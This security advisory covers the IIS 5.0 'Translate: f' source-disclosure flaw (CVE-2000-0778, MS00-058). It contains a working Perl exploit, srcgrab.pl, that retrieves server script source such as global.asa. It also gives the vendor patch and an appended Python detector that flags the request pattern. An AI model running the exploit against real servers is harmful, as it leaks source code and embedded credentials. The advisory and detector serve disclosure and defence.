Microsoft IIS 5.0
2008-04-09 04:35:54 Source: Internet
Published: 2000-08-14
Updated: 2000-08-14
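Affected systems:
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server
Description:
BUGTRAQ ID: 1578
CVE(CAN) ID: CVE-2000-0778
IIS is a popular HTTP server developed by Microsoft and bundled with the Windows operating system.
IIS 5.0 has a vulnerability in the way it handles certain HTTP requests that carry a special marker; a remote attacker may exploit it to obtain the source code of scripts on the server.
If IIS 5.0 receives an HTTP request that contains a specially formatted header (Translate: f) and whose URL ends with a special character ("/"), IIS invokes the script processing engine incorrectly, which may disclose the file's source code to the remote user.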
<*Source: Daniel Docekal (ddoc@MIA.CZ)
Links: http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0080.html
http://www.ciac.org/ciac/bulletins/k-065.shtml
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
*>
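Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!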
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven´t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)
if (not $ARGV[0]) {
print qq~
Geee it´s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
Recommendation:
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS00-058) and a corresponding patch for this issue:
MS00-058: Patch Available for "Specialized Header" Vulnerability
Link: http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
Patch download:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769
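A defender-side check for the request pattern described above, as an added example that is not part of the original advisory: it parses raw HTTP request heads (for example from a reverse proxy or IDS capture) and flags those that combine a Translate: f header with a script URL ending in "/" or "\". The sample requests, the host www.example.com, the extension list and all function names are constructed for illustration.

```python
from urllib.parse import unquote

# Script extensions taken from the page's examples (global.asa, default.asp);
# the tuple is an assumption: extend it for other script-mapped types.
SCRIPT_EXT = (".asp", ".asa")

def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def is_translate_f_probe(raw):
    """True for Translate: f plus a script URL ending in '/' or '\\'."""
    try:
        _, target, headers = parse_request(raw)
    except ValueError:
        return False
    # WebDAV authoring clients also send Translate: f, so the header alone
    # is not enough; require the trailing separator after a script name.
    if headers.get("translate", "").lower() != "f":
        return False
    path = unquote(target.split("?", 1)[0])  # decodes %5c / %2f
    stripped = path.rstrip("/\\")
    return stripped != path and stripped.lower().endswith(SCRIPT_EXT)

# Constructed sample requests (www.example.com is a placeholder host).
SAMPLES = {
    "backslash": "GET /global.asa\\ HTTP/1.0\r\nTranslate: f\r\n\r\n",
    "encoded": "GET /default.asp%5C HTTP/1.1\r\nHost: www.example.com\r\ntranslate: F\r\n\r\n",
    "slash": "GET /default.asp/ HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "webdav": "GET /docs/report.doc HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "no_header": "GET /default.asp/ HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "plain": "GET /default.asp HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
}

def scan(samples):
    """Return the names of samples that match the probe pattern."""
    return sorted(n for n, raw in samples.items() if is_translate_f_probe(raw))

if __name__ == "__main__":
    print(scan(SAMPLES))
```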